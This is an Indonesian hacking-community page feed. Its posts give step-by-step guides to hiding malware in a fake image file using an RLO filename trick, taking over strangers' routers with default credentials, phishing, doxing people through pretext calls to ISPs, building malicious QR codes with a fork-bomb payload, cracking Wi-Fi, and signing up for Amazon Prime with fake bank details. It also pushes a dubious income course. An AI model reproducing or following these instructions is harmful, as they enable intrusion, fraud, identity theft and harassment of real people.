Wlingi-Blitar Hacker Pages

Wlingi-Blitar Hacker Pages Semoga bermanfaat untuk kalian semua guys.. Kita berusaha untuk menciptakan budaya yang santun, dan menjaga kedaulatan bangsa dari peretas hacker pihak asing...
(1)

KOMPETISI CEHv12 EC-COUNCILHACKER SELURUH DUNIA, TERDAFTAR 145 NEGARATUGAS UTAMA DAN MISI YG DIBERIKAN AKAN BERBEDA-BEDA...
18/11/2022

KOMPETISI CEHv12 EC-COUNCIL

HACKER SELURUH DUNIA, TERDAFTAR 145 NEGARA

TUGAS UTAMA DAN MISI YG DIBERIKAN AKAN BERBEDA-BEDA JUGA ADA UJIAN PILIHAN GANDA..

DAPATKAN GRATIS SERTIFIKAT REK!!!!

Yuk rek GAS KAN, SEMANGAT INDONESIA BISA!!!!

12/12/2021

⚠Hati-hati Ringkasan Plan Bisnis⚠

Perubahan infrastruktur yang dibuat oleh perusahaan untuk memungkinkan akses jarak jauh, juga membutuhkan banyak aktor ancaman untuk beradaptasi dengan dunia hybrid yang mengintegrasikan teknologi cloud. Selain itu, penyebaran yang cepat dari virus corona dan upaya penelitian global untuk menemukan vaksin telah menciptakan "Opsi Phishing Baru" dan melalui lembaga penelitian medis dengan mudah melacak target yang dicari oleh pelaku kriminal dan negara.

Kami akan membahas efek ini dan lebih banyak aspek lanskap ancaman, sambil memberikan contoh dan statistik peristiwa dunia nyata.

Berikut adalah beberapa tren serangan cyber yang kami bahas:

📋 Pemerasan ganda (Double Extortion)

Pelaku ransomware telah mengadopsi strategi baru selain membuat file korban tidak dapat diakses, mereka sekarang mengekstrak sejumlah besar data sebelum di enkripsi pada tahap akhir serangan. Korban yang menolak pembayaran tuntutan menemukan data mereka yang paling sensitif dan dapat ditampilkan secara publik di situs web khusus.

📋 Perang maya (Cyber Warfare)

Aktivitas cyber dalam negara telah mengalami lonjakan intensitas dan eskalasi yang sangat signifikan. Di saat taktik tradisional untuk mengumpulkan intelijen dan pengetahuan tidak lagi layak karena jarak sosial, penggunaan cyber ofensif senjata untuk mendukung misi nasional tampaknya telah berkembang. Tujuannya mungkin pemahaman yang lebih baik tentang Virus Corona atau pengamanan operasi intelijensi suatu negara serta industri lain yang akan menjadi sasarannya.

📋 Seluler (Mobile)

Pelaku ancaman telah mencari vektor infeksi baru di dunia seluler, mengubah dan meningkatkan teknik mereka untuk menghindari deteksi di tempat-tempat seperti toko aplikasi resmi. Dalam satu serangan inovatif, pelaku ancaman menggunakan sistem Manajemen Perangkat Seluler (MDM) perusahaan internasional besar untuk mendistribusikan malware ke lebih dari 75% dari perangkat seluler yang dikelolanya.

📋 Cloud

Industri diharuskan melakukan penyesuaian infrastruktur yang cepat untuk mengamankan produksi mereka saat bekerja dari jarak jauh. Dalam banyak kasus, ini tidak akan mungkin terjadi tanpa teknologi cloud. Namun, mereka juga mengekspos lebih banyak salah konfigurasi atau hanya aset yang tidak terlindungi ke internet. Selain itu, untuk pertama kalinya, kerentanan yang mengkhawatirkan terungkap dalam infrastruktur Microsoft Azure yang dapat memungkinkan pihak penyerang untuk lolos dari infrastruktur VM dan kompromi pelanggan lain.

📡Retas Akun Facebook & Gmail yang Login Melalui MacOS📡
09/12/2021

📡Retas Akun Facebook & Gmail yang Login Melalui MacOS📡

Part 1📡Cara Sembunyikan Virus Kedalam Gambar 📡 Hari ini saya  akan membahas salah satu cara paling sederhana menyamarkan...
09/12/2021

Part 1

📡Cara Sembunyikan Virus Kedalam Gambar 📡

Hari ini saya akan membahas salah satu cara paling sederhana menyamarkan malware termasuk didalamnya adalah pencurian data, keylogger, dan hal-hal buruk lainnya yg disembunyikan.

📲 Sebelumnya Anda harus memiliki peralatan virusnya (malware) terlebih dahulu.

️📲 Buat folder baru, lalu satukan gambar dan virus disana. ️

📲 Buka website icoconvert(.)com dan buat ikon untuk gambar Anda (dalam pengaturan format, pilih dari 16x16 hingga 256x256). Selanjutnya, klik "Konversi ICO" dan unduh ikon. ️

📲 Jangan sentuh ikonnya dulu. Kembali ke folder > pilih gambar dan virus > tambahkan ke arsip. ️

📲 Dalam parameter arsip, lakukan hal berikut.

- Klik "Buat arsip self-extracting"
- Pada "Opsi SFX"
- Buka "Perbarui"
- Klik "ekstrak dan perbarui semua file"
- Dan "timpa semua file tanpa diminta". ️

📲 Buka tab "Instalasi" dan tentukan file mana yang harus dibuka selama peluncuran executable Anda (pertama gambar, lalu virus)

📲 Buka tab "Mode" dan klik "Buka paket ke folder sementara" dan "sembunyikan semua".

📲 Buka tab "teks dan grafik" dan muat ikon kami (ikon). Jadi, kami mengganti ikon arsip dengan ikon gambar kami. ️

📲 Sekarang kami memiliki executable (exemple.exe) dengan ikon foto kami. Cukup pucat, jadi kita akan menggunakan satu trik. Kita rename file kita, yaitu kita masukkan di antara nama dan titik "gpj" (exemplegpj.exe). Sekarang kita arahkan kursor di depan "gpj", klik pkm dan pilih "masukkan karakter kontrol Unicode"> Pilih RLO.

Sekarang virus yg telah disamarkan dalam gambar tidak terlihat seperti exemple.exe, tetapi exemple.jpg‌‌.

08/12/2021

🔰Berbagai Jenis Serangan Peretasan🔰

Peretas membagi serangan mereka menjadi beberapa jenis.

Jenis-jenis ini adalah:

📝 Nonteknis Teknik ini berfokus pada pengguna akhir (yaitu orang yang menggunakan perangkat target). Karena manusia memiliki kecenderungan alami untuk mempercayai orang lain, peretas dapat menembus pertahanan sistem tanpa menggunakan alat elektronik apa pun.

Peretas ini dapat menggunakan taktik "rekayasa sosial" untuk mendapatkan kepercayaan pengguna dan mendapatkan akses ke jaringan atau file. Anda akan belajar lebih banyak tentang rekayasa sosial nanti.

Seorang hacker juga dapat menerapkan serangan fisik terhadap targetnya. Misalnya, ia dapat masuk ke ruang komputer dan mengakses satu atau lebih perangkat yang ada.

Sebagai alternatif, ia dapat memeriksa tempat sampah di gedung dan mencoba mencari informasi yang berguna (misalnya kata sandi). Peretas menyebut pendekatan ini sebagai "penyelaman tempat sampah".

📝 Jaringan Peretas dapat menerapkan serangan semacam ini dengan mudah, karena sebagian besar jaringan dapat diakses melalui internet.

Bentuk serangan jaringan yang paling umum adalah: - Mengakses jaringan menggunakan modem yang dicurangi.

- Mengambil keuntungan dari kerentanan dalam mekanisme transportasi digital (misalnya NetBIOS).

- Mengirim aliran permintaan yang berkelanjutan ke jaringan.

- Rigging sistem dan pengumpulan paket data untuk mengakses informasi rahasia.

📝 Sistem Operasi Serangan ini memainkan peran penting dalam perangkat peretas mana pun. Itu karena setiap komputer memiliki sistem operasi. Dan ada banyak alat yang dapat Anda gunakan untuk memecahkan OS (yaitu sistem operasi) komputer. Ada banyak sistem operasi di luar sana. Namun, peretas biasanya fokus pada yang paling populer (misalnya sistem Windows).

Berikut adalah beberapa serangan OS yang dapat Anda gunakan:

- Menghancurkan keamanan sistem file.

- Menguraikan kata sandi.

- Menyerang mekanisme otentikasi yang sudah diinstal sebelumnya.

- Mengambil keuntungan dari kerentanan dalam protokol tertentu.

📝 Aplikasi Beberapa peretas memanfaatkan program komputer untuk menyerang jaringan. Seringkali, seorang peretas mendapatkan akses ke mesin melalui aplikasi berbasis web atau program terkait email.

Bentuk yang paling populer dari jenis ini adalah:

- Mengirim "spam" (yaitu email sampah) kepada orang-orang.

- Memasang malware (yaitu perangkat lunak berbahaya) di sistem target.

- Melewati mekanisme keamanan (misalnya firewall) melalui protokol "online" (misalnya SMTP, HTTP, IMAP, dll.)

09/03/2021

DISTRO LINUX TERBAIK UNTUK PENGEMBANG (DEVELOPERS)

➥ Manjaro
Distro Arch ramah pengguna yang dapat Anda gunakan untuk semua jenis pengembangan.

+ Berdasarkan Arch
+ Beberapa edisi
+ Alat khusus yang intuitif

Manjaro mengklaim distro tersebut dilengkapi dengan alat yang diperlukan untuk mengkompilasi dan mengembangkan perangkat lunak untuk pengembang lain juga.

➥ Puppy Linux
Pilihan terbaik untuk mengembangkan pada mesin yang lebih lama.

+ Ringan
+ Fungsionalitas di luar kotak
+ Dukungan pemrograman yang kuat

Puppy Linux adalah distro yang sangat ringan yang memiliki edisi terpisah berdasarkan Ubuntu dan Slackware.

➥ Solus
Distro yang mengalami perubahan tetapi stabil untuk pengembang.

+ Rilis perubahan yang dikurasi
+ Beberapa edisi
+ Mendukung kasus penggunaan pengembangan

Solus istimewa karena merupakan salah satu dari sedikit distro Linux Irlandia, dan juga karena mengikuti model rilis perubahan yang dikurasi.

➥ Sabayon Linux
Workstation pemrograman terbaik untuk pengguna Gentoo.

Sabayon Linux dilengkapi dengan beberapa alat pengembangan, terutama untuk pengembang Python, tetapi Anda dapat menginstal lebih banyak lagi menggunakan sistem manajemen paket portage yang terkenal dari Gentoo.

➥ Garuda Linux
Garuda Linux menggunakan BTRFS sebagai filesytem default dengan kompresi zstd.

BTRFS adalah sistem file copy on write (CoW) modern untuk Linux yang bertujuan mengimplementasikan fitur-fitur canggih sambil juga berfokus pada toleransi kesalahan, perbaikan, dan administrasi yang mudah.

Garuda Linux adalah distro rilis bergulir berbasis Arch Linux yang memastikan selalu mendapatkan pembaruan perangkat lunak terbaru.

Cara install Metasploit 6 di Termux Terbaru Februari 2021Untuk install Metasploit 6 di termux sangat sederhana sekali, A...
12/02/2021

Cara install Metasploit 6 di Termux Terbaru Februari 2021
Untuk install Metasploit 6 di termux sangat sederhana sekali, Anda hanya perlu mengikuti langkah-langkah di bawah ini agar mudah untuk di praktekkan langsung.
📲 Pertama-tama install dulu aplikasi termuxnya dan lakukan update upgrade atau lihat perintah dibawah ini.

$ pkg update && pkg upgrade -y
📲 Sebelum install Metasploit 6 di Termux, terlebih dulu install arah yg diperlukan dalam keadaan apapun jika ada kesalahan.

$ pkg install -y root-repo git python
$ git clone https://github(.)com/karjok/terkey && cd terkey && chmod 771 terkey.py && python terkey.py

Jika muncul pilihan untuk memunculkan arah, pilih No. 1 lalu "Enter".
📲 Selanjutnya kita beraksi untuk install Metasploit 6 di Termux.

$ pkg install -y wget curl Ruby
$ wget https://raw(.)githubusercontent(.)com/Hax4us/Metasploit_termux/master/metasploit.sh
$ chmod +x metasploit.sh && ./metasploit.sh
📲 Untuk menjalankan Metasploit 6 ikuti perintah dibawah ini.

$ msfconsole
Dan Taraaa!!! Selamat Anda berhasil meng-install Metasploit 6 di Termux.😁😊

10/02/2021

Cara Install Metasploit 6 di Fakeroot Ubuntu Termux Terbaru Februari 2021

Pertama-tama kalian harus install aplikasinya terlebih dahulu yaitu "Termux".
Jika sudah di Download, sekarang open aplikasinya dan siap untuk beraksi.

Ikuti langkah-langkah berikut ini:

➣ Pertama Anda harus update terlebih dahulu lalu install arah untuk mempermudah Anda untuk mengatur kendali termux.

$ pkg update && pkg upgrade -y
$ pkg install -y git python nano mc
$ pkg install -y proot root-repo
$ git clone https://github(.)com/karjok/terkey && cd terkey
$ chmod 771 terkey.py
$ python terkey.py

➣ Jika sudah maka langkah selanjutnya install fakeroot Ubuntu.

$ git clone https://github(.)com/MFDGaming/ubuntu-in-termux.git
$ cd ubuntu-in-termux
$ chmod +x ubuntu.sh && ./ubuntu.sh

Untuk menjalankankan Ubuntu, ikuti perintah dibawah ini:

$ ./startubuntu.sh

➣ Selanjutnya Anda harus update terlebih dahulu.

:~ # apt-get update && apt-get upgrade -y

:~ # apt-get install -y git python python-pip python3-pip clang nodejs npm

➣ Sebelum install metasploit, Anda harus install paket-paketnya atau file-file utamanya.

:~ # apt-get install -y build-essential libreadline-dev libssl-dev libpq5 libpq-dev libreadline5 libsqlite3-dev libpcap-dev subversion git-core autoconf postgresql pgadmin3 curl zlib1g-dev libxml2-dev libxslt1-dev libyaml-dev openjdk-11-jdk
openjdk-13-jdk openjdk-14-jdk

:~ # apt-get install -y ruby ruby-dev ruby-msfrpc-client recon-ng

➣ Jika sudah di install semua sekarang kita mulai install Metasploitnya.

:~ # apt-get install -y wget curl && curl https://raw(.)githubusercontent(.)com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && chmod 755 msfinstall && ./msfinstall

Untuk menjalankan Metasploit6 ikuti perintah dibawah ini:

:~ # msfconsole

Taraaa!!! Anda sudah masuk di Metasploit 6 terbaru tahun 2021.

03/02/2021

Cara Meretas Router Rumah Dan Mendapatkan Hak Admin

📝 Persyaratan:

👉 Port Scanner (zenmap, superscan atau unicornscan. Saya menggunakan Zenmap).
👉 Browser Web (Chrome, Firfox atau Safari).
👉 Koneksi Internet (Segala jenis koneksi Internet).

📌 Pertama-tama saya ingin memberi tahu Anda mengapa saya menggunakan Zenmap, karena Nmap adalah teman terbaik para peretas dan Zenmap adalah antarmuka pengguna grafis Nmap.

Instruksi tentang Cara Meretas Router Rumah dan mendapatkan Hak Admin:

➣ Kita harus memilih rentang IP. Anda telah memilih rentang IP yang menyertakan alamat IP publik saya. ###.###.30.0-###.###.30.255.

➣ Sekarang mari kita pindai router rumah.
Setelah Anda selesai memindai, Anda dapat menemukan alamat IP yang memiliki port terbuka seperti port http (80), port ftp (21) dan port telnet (23).

Anda telah menemukan banyak IP address dengan port 80 terbuka, jadi hentikan pemindaiannya.

➣ Sekarang Anda dapat mengakses addess ini menggunakan browser web Anda karena port http terbuka dan kita perlu mencari tahu apakah halaman web tersebut adalah halaman login router.

➣ Jika Anda melihat pesan kesalahan peringatan, dikatakan TD-8817. Jadi kami dapat Google untuk itu atau Anda dapat mengunjungi routerpassword.com untuk mengetahui nama pengguna dan kata sandi router default.

➣ Sekarang mari kita coba mengakses alamat IP ini menggunakan login default yang baru kita dapatkan di langkah 4. Nama pengguna dan kata sandi default tidak sama untuk setiap router. Dengan username: admin dan password: admin, kita bisa login ke halaman administrasi router.

03/02/2021

📱📲Cara Melakukan Phishing & Cara Menghindarinya📵💻

Phishing adalah salah satu terminologi yang paling banyak digunakan dalam peretasan. Pada artikel ini, kita akan membahas tentang bagaimana melakukan phishing, bagaimana penyerang menggunakan phishing untuk mencuri data Anda dan bagaimana Anda dapat menghindarinya. Selain itu, artikel ini untuk tujuan pendidikan dan kami tidak mendukung aktivitas ilegal apa pun.

📝 Pertama-tama mari kita bahas tentang apa itu phishing?

Phishing terdengar seperti memancing, dan agak mirip. Pada dasarnya, phishing berarti mencuri data pribadi dan kredensial seseorang dengan menyamar sebagai perusahaan, situs web tepercaya, dll.

🏔️ Mari kita lihat contohnya:
Jika seseorang mengkloning halaman login Facebook dan mengirimi Anda link yang meminta Anda untuk login dan memeriksa maka itu phishing. Namun, ini adalah contoh yang sangat sederhana hanya untuk menunjukkan cara kerjanya. Peretas lebih kreatif daripada hanya menyalin situs web sederhana dan mengirimi Anda pesan. Ini mungkin datang dalam bentuk surat, pemberitahuan atau pesan teks yang memberitahu Anda untuk memeriksa sesuatu atau mengambil tindakan pada akun Anda dan banyak lagi barang lainnya.

Nah, sekarang mari kita bahas langkah-langkah yang digunakan untuk melakukan phishing.

🔓 Bagaimana Cara Melakukan Phishing?
Berikut langkah-langkah dasar menggunakan phishing.

1. Kloning situs terkenal seperti Facebook, Twitter, atau situs apa pun yang mungkin Anda sukai. Pada dasarnya mengkloning halaman login sehingga Anda mendapatkan kata sandi secara langsung.

2. Temukan korban dan kirimkan tautan situs kloning memintanya untuk masuk. Itu tergantung pada kreativitas Anda bagaimana Anda melakukannya.

3. Saat korban login di situs kloning Anda akan mendapatkan detail tentang korban. Anda dapat menemukan cara melakukan hal-hal ini secara online. Alat yang paling banyak digunakan untuk tujuan ini adalah SET (Alat Rekayasa Sosial) dan dapat digunakan di Kali Linux. Jika Anda menginginkan artikel mendetail tentang kloning situs dan mendapatkan kredensial, beri komentar.

🔐 Bagaimana Cara Menghindarinya?

Sekarang mari kita bahas tentang cara menghindari data Anda dicuri oleh phishing. Berikut beberapa tip untuk menghindari phishing. Jangan pernah login di situs yang tidak dikenal:

👉 Jadi, ini sederhana dan cukup jelas. Ada banyak kasus ketika munculan tiba-tiba muncul yang menyarankan Anda untuk mencoba beberapa hal. Dan ketika Anda mengklik di sana, Anda diminta untuk masuk melalui Facebook, gmail, atau akun sosial lainnya. Jangan pernah melakukannya kecuali situs web yang Anda kunjungi adalah situs yang dapat dipercaya.

👉 Membuat akun menggunakan gmail atau Facebook tidak memerlukan kata sandi: Anda membacanya dengan benar. Saat Anda membuat akun, katakanlah situs kencan menggunakan akun Facebook Anda sebagai contoh. Anda tidak perlu menggunakan kata sandi Facebook Anda di dalam situs web itu. Satu-satunya hal yang harus Anda lakukan adalah memberikan izin di Facebook. Jadi, jika Anda diminta memasukkan kata sandi Facebook, pikirkan dua kali sebelum menekan keyboard.

👉 Jangan pernah mengklik link yang dikirim dari akun email yang tidak Anda kenal: Ya, tidak perlu penjelasan lebih lanjut.

📝 Lihat URL Situs Web Sebelum Masuk:
Ini adalah cara paling berguna untuk mencegah diri Anda dari phishing. Selalu periksa alamat webnya. Misalnya jika alamat phishing meminta Anda untuk masuk, URL tersebut tidak akan pernah memiliki URL yang sama dengan URL Facebook "https://www.facebook.com". Ini mungkin memiliki alamat IP seperti "123.123.3.1" atau beberapa URL yang berbeda seperti "www.facebook.com 2". Perhatikan bahwa URL kedua yang saya sebutkan memiliki huruf besar O. Jadi, jika Anda memperhatikan dengan baik, Anda dapat membedakan situs phishing dengan situs yang sebenarnya.

20/11/2020

CARA MELAKUKAN DOX ke SIAPAPUN

Dox, atau doxing, adalah sebuah praktik berbasis internet untuk meneliti dan menyebarluaskan informasi pribadi secara publik terhadap seseorang individu atau organisasi.

Metode ini digunakan untuk memperoleh informasi termasuk mencari basis data yang tersedia untuk umum dan situs sosial media (seperti Facebook), meretas, dan praktik ini erat terkait dengan vigilantisme internet dan hacktivisme.

METODE 1

IP/Nomor Telepon DOX oleh datalinkslayer

1. Dapatkan alamat IP korban, ini bisa melalui metode yang sederhana seperti mengambil IP, atau Anda dapat mencari basis data jika Anda tidak dapat mengatur untuk mengambil IP tersebut. Hati-hati dengan database, ada yang sudah ketinggalan zaman.
2. Pergi ke sini atau yang serupa, dan masukkan alamat IP korban.
3. Cari IP atau Organisasi korban.
4. Temukan nomor dukungan ke IP mereka, dan hubungi. Anda dapat memalsukan sebagai nomor orang dalam ke perusahaan mereka, atau hanya menggunakan nomor telepon sekali pakai.

METODE 2

Untuk metode 2 tersebut akan dijelaskan di bawah ini.

Metode Angka Dalam

1. Spoof nomor telepon Anda ke nomor internal di ISP (Internet Service Provider). Ini dapat ditemukan dengan mencari semua nomor dukungan mereka dan memilih salah satu untuk memalsukan diri Anda. Spoofer apa pun dapat digunakan, tidak akan mudah bagi mereka untuk melacak Anda dengan jumlah panggilan yang mereka terima.
2. Panggil nomor dukungan yang berbeda dari nomor yang Anda spoofing.
3. Saat Anda berbicara dengan perwakilan, ucapkan hal berikut (sesuaikan kata-kata dengan keinginan Anda), "Halo, ini adalah Tn. Datalinklayer menelepon dari departemen dukungan obrolan. Saya baru-baru ini membantu pelanggan ketika sambungan saya terputus, dan ingin menghubungi mereka untuk memastikan bahwa mereka mendapatkan dukungan yang dibutuhkan. Sayangnya, saya hanya menonaktifkan IP mereka, apakah Anda dapat membantu saya menemukan pelanggan ini?"
4. Setelah itu jika Anda mengatakannya dengan nada yang sopan, tanpa gagap atau mencicit, mereka dengan senang hati akan membantu Anda. Jika mereka tidak berterima kasih atas waktunya, tutup telepon dan telepon lagi dalam 5 menit.
5. Jika mereka tetap saja begitu, maka langkah selanjutnya beri mereka IP Address yang telah Abda Spoof sebelumnya dan tanyakan nama, nomor telepon, dan alamat terkait. Jika Anda cukup meyakinkan, Anda bahkan dapat menemukan 4 digit terakhir SSN mereka.
6. Berterimakasihlah kepada karyawan tersebut, jangan bersikap kasar karena ini bisa membuat mereka dipecat, kemudian tutup telepon.

METODE 3

Anda sekarang memiliki info yang Anda butuhkan.

Metode Nomor ThrowAway

1. Hubungi saluran dukungan ISP, jangan gunakan nomor pribadi Anda, cukup gunakan sekali pakai secara acak.
2. Beri tahu mereka dukungan bahwa Anda adalah penyelidik swasta dalam kasus kejahatan dunia maya (Anda HARUS terdengar sangat meyakinkan) dan bahwa Anda memerlukan info ke alamat IP yang Anda miliki untuk membuat panggilan pengadilan (diucapkan soup-eena).
3. Jika tidak berhasil, tutup telepon, tunggu 5 menit, lalu coba lagi. 4. Pada akhirnya, Anda akan menemukan karyawan baik yang bersedia membantu.

CATATAN AKHIR

Anda juga dapat melakukan hal ini dengan nomor telepon. Hubungi penyedia telepon (layanan) dan ikuti langkah yang sama, mengganti IP dengan nomor telepon. Meskipun sulit dilacak, namun cara ini jangan digunakan ke siapapun baik teman dekat atau dalam lingkup pemerintahan. Karena Anda akan terlibat masalah hukum dan berakhir sel penjara.

28/02/2020

🎓Membuat Kode QR untuk Meretas Ponsel & Pemindai Lainnya Menggunakan App Termux Android🎓

📋 QRgen untuk Peretasan Kode QR

Alat yang disebut QRGen dapat membuat kode QR berbahaya dan bahkan menyandikan payload yang dibuat khusus. Kategori payload yang tersedia di QRGen dapat diakses dengan menggunakan flag -l dan angka saat menjalankan skrip. Jumlah dan jenis muatan tercantum di bawah ini.

0: SQL Suntikan
1: XSS
2: Injeksi Perintah
3: Format String
4: XXE
5: String Fuzzing
6: SSI Injection
7: LFI / Directory Traversal

Untuk membuat banyak kode QR berbahaya yang memerlukan payload string-fuzzing, Anda hanya perlu menjalankan QRGen.py -l 5 untuk membuat banyak kode untuk pengujian.

📝 Langkah 1: Instal QRGen pada Ubuntu 19

➢$ pkg update && pkg upgrade -y
➢$ pkg update -y && pkg install proot wget tar pulseaudio -y && wget https://raw.githubusercontent.com/AndronixApp/AndronixOrigin/master/Rootfs/Ubuntu19/ubuntu19.sh && chmod +x ubuntu19.sh && ./ubuntu19.sh
➢$ ./start-ubuntu19.sh
➢$ apt update && apt upgrade -y
➢$ apt install -y git python python3 ruby nano wget curl python-pip python3-pip
➢$ pip install --upgrade pip && pip2 install --upgrade pip && pip3 install --upgrade pip

📝 Langkah 2: Membuat Kode QR Berbahaya dari Jenis Muatan

➢$ git clone https://github.com/h0nus/QRGen
➢$ cd QRGen
➢$ ls
➢$ python3 -m pip install -r requirements.txt

Jika install requirements gagal pada paket Pilllow jangan khawatir, kita cari solusinya

➢$ apt-get install -y libpillowfight libpillowfight-dev python-dev python-setuptools python-pil python-tk python-willow python3-pypillowfight python3-willow
➢$ git clone https://github.com/python-imaging/Pillow
➢$ cd Pillow
➢$ make && make install
➢$ pip3 install -r requirements.txt
➢$ python3 setup.py install

📝 Langkah 3: Encode Payloads Kustom

➢$ chmod 711 qrgen.py
➢$ python3 qrgen.py
➢$ python3 qrgen.py -l 5
➢$ cd genqr
➢$ ls
➢$ nano badstuff.txt

Masukkan kode dibawah ini pada badstuff.txt

:(){ :|: & };:

➢$ cd ..
➢$ python3 qrgen.py -w '/username/QRGen/genqr/badstuff.txt'

"Payload path exist, continuing...
Path already cleared or deleted..
Generated 1 payloads!
Opening last generated payload...
Thanks for using QRGen, made by H0nus.."

Jika terjadi Error atau [Errno 2] No such file tahan sementara, akan ada tutorial lain pada postingan selanjutnya.

🛃Kursus: Gold Rush 2020 atau cara membuat penghasilan pasif selama bertahun-tahun🛃Dalam kursus ini Anda akan belajar car...
23/01/2020

🛃Kursus: Gold Rush 2020 atau cara membuat penghasilan pasif selama bertahun-tahun🛃

Dalam kursus ini Anda akan belajar cara membuat sumber pendapatan pasif pada layanan cashback tanpa pembelian dan investasi.

Pada awalnya, tidak diperlukan investasi. Dalam hal ini, Anda akan mulai menerima penghasilan di hari-hari pertama. Lampiran hanya diperlukan jika Anda ingin skala.

Tidak ada batas atas penghasilan. Menghasilkan 50.000 - 70.000 rubel pada bulan pertama adalah tugas dasar, bahkan untuk pemula yang lengkap. Hanya mengatur sistem dalam beberapa minggu dan membaca krim. Penting untuk dipahami bahwa, karena kekhasan model bisnis, pendapatan tidak pernah turun, tetapi tumbuh setiap saat. Artinya, setiap bulan penghasilan Anda akan meningkat, bahkan jika Anda memutuskan untuk berhenti dan melakukan sesuatu yang lain.

Anda dapat melihat kursus di sini:

https://cloud.mail.ru/public/2ga4/4SzuoMVu2

Облако Mail.ru - это ваше персональное надежное хранилище в интернете.

23/01/2020

◽⭕◽◽UNTUK HARI INI◽◽⭕◽

⚡ CARA MENJALANKAN FILE .EXE DI ANDROID ⚡

File-file dengan ekstensi EXE adalah file yang dapat dieksekusi yang dimaksudkan untuk digunakan dalam Windows atau MS-DOS. Anda tidak dapat membuat semua file EXE berfungsi di Android. Namun, banyak file EXE berbasis DOS yang lebih lama dapat dibuka dengan emulator DOS, DOSBox.

🎲️ Langkah 1

Instal aplikasi DOSBox di perangkat Android Anda. AnDOSBox, aDosBox dan DosBox Turbo adalah tiga aplikasi DOSBox berbeda yang tersedia dari Google Play store.

🎲 Langkah 2

Buka aplikasi DosBox

🎲 Langkah 3

Ketik "help" lalu "cd \foldername" ke dalam baris perintah, di mana "foldername" menunjukkan folder di mana EXE Anda terkandung. Misalnya, jika EXE Anda ada di folder Unduh, ketikkan "cd \Download."

🎲 Langkah 4

Klik Enter pada keyboard Android Anda.

🎲️ Langkah 5

Masukkan nama file EXE. Anda tidak perlu memasukkan ekstensi .exe.

🎲 Langkah 6

Ketuk "Enter" pada keyboard Android Anda.

◽⭕◽◽◽◽◽⭕◽

17/01/2020

🛠 Mechanical Cracking Password Wi-Fi 🛠

📋 Persyaratan Peretasan Wireless

🔑 Wireless Adapter (Card Wireless)

Untuk meretas jaringan Wi-Fi menggunakan Kali Linux, Anda harus mempunyai "Card Wireless" untuk mendukung mode monitor dan injeksi paket. Tidak semua kartu nirkabel dapat melakukan ini, dan mulai meretas jaringan WEP dan WPA Wi-Fi.

🔑 Perangkat Lunak Peretasan Wi-Fi Baik

Perangkat lunak yang dimaksud adalah alat (tools) yang diperlukan untuk meretas jaringan wireless, saya rekomendasikan menggunakan peretasan Aircrack-ng dan alat (tools) dengan serangkaian instalasi beberapa paket penting seperti Airgeddon dll.

🔑 CPU Cepat & Kuat

CPU multi-core atau multi-prosesor yang cepat tentu saja sangat membantu. Saat meretas kata sandi WEP yang merupakan celah statistik, Anda harus menghitung banyak angka, dan semakin cepat CPU semakin baik. Cracking WPA2 pada dasarnya melibatkan daftar jutaan hash password, yang juga sangat intensif. Jadi, semakin cepat CPU, semakin cepat Anda dapat memecahkan kata sandi wireless baik Android maupun PC.

📋 Cara Cracking Kata-Sandi Wi-Fi

Jika Anda ingin meretas Wi-Fi maka pertama-tama Anda perlu menemukan kerentanan dalam jaringan Wi-Fi seperti kebanyakan jaringan Wi-Fi publik memiliki kerentanan.

Jadi, jika Anda dapat melihat jenis-jenis kerentanan itu maka ya jaringan WiFi siap untuk diretas. Sebagian besar peretas menggunakan Linux OS Kali (Backtrack sebelumnya) untuk meretas jenis-jenis jaringan Wi-Fi yang rentan.

Itu tergantung pada sistem Wi-Fi, namun jika itu adalah jaringan dari titik akses Wi-Fi maka ada alat di sekitar yang mampu memecahkan dan melakukannya. Umumnya membutuhkan PC atau Mac dan alat ini menempatkan antarmuka Wi-Fi ke mode promiscuous - yang berarti ia hanya akan mendengarkan jaringan Wi-Fi di sekitar dan hanya mendapatkan semua paket yang dikirim oleh perangkat lain (tidak semua sistem memungkinkan adaptor Wi-Fi menjadi dalam mode promiscuous, Anda mungkin harus melakukan root Android atau iOS untuk mendukung ini).

Jalankan alat 'crack' tool (beberapa telah disebutkan dalam postingan lain), ini hanya akan menempatkan dan mengumpulkan data yang cukup sehingga kunci WPA atau WEP dapat di-crack (ada juga kekurangan di kedua protokol yang memungkinkan mempercepat ini), tetapi beberapa Gigabytes data perlu dikumpulkan untuk memiliki lalu lintas terenkripsi yang cukup untuk mencoba dan mengekstrak kunci.

Enjoy guys..🔎📡
🇮🇩🇮🇩🇮🇩🇮🇩🇮🇩🇮🇩
🔮 Always Support Ethical Hacking Termux 🔮

16/01/2020

📝 TECHNICAL MENDAPATKAN VIDEO AMAZON PRIME DENGAN TRIK RAHASIA GRATIS 2020 📝

➢ Buka Mode Penyamaran Chrome

➢ Ketikkan amazon.de & ENTER
(Hubungkan VPN Jerman)

➢ Buat Akun Baru - [FAKE]
(Untuk Penggunaan Alamat Email Gratis - gmx.co.uk)

➢ Sekarang Verifikasikan Alamat Email Anda
(Kode Dikirim ke ID Email Anda)

➢ Sekarang Setelah Masuk Klik Pada Akun

➢ Klik Prime

➢ Klik Try prime

➢ Sekarang Pilih Metode Pembayaran (Klik Tambah Akun Bank)

Tetapi Bagaimana Cara Mendapatkan Rincian Bank Gratis?

Langkah 1 - Pergi ke fake-it(dot)ws
Langkah 2 - Klik pada bendera Jerman
Langkah 3 - Gulir ke Bawah Dan Temukan Nomor IBAN & BIC.

➢ Setelah Mendapatkan IBAN & BIC Isi Detail itu di Amazon prime Page & Klik Kirim.

➢ Sekarang Isi Alamat (harus menjadi negara Anda yang sebenarnya):

✎ Street - Alamat Anda
✎ City - Kota Anda
✎ State - Perusahaan Anda
✎ Pincode - Kode Pos Anda
✎ Country - Negara Anda
✎ Phone Number - Masukkan Nomor 10 Digit

➢ Klik OK

➢ Klik Pada Konfirmasi

➢ Sekarang Anda Dapat Amazon Prime Gratis

➢ Login Dengan Prime Video: primevideo.com/


➢ Sekarang Pilih Negara Anda Di Video Perdana Dan Klik Kirim

Enjoy for Watching.. 📺📽
🇮🇩🇮🇩🇮🇩🇮🇩🇮🇩🇮🇩🇮🇩
🔮 Always Support Ethical Hacking Termux 🔮

📕📖 All Hacker Disarankan Kursus untuk Memperoleh Sertifikat OSCP Resmi 📖📕📜 IKHTISAR KURSUSPengujian Penetrasi dengan Kal...
15/01/2020

📕📖 All Hacker Disarankan Kursus untuk Memperoleh Sertifikat OSCP Resmi 📖📕

📜 IKHTISAR KURSUS

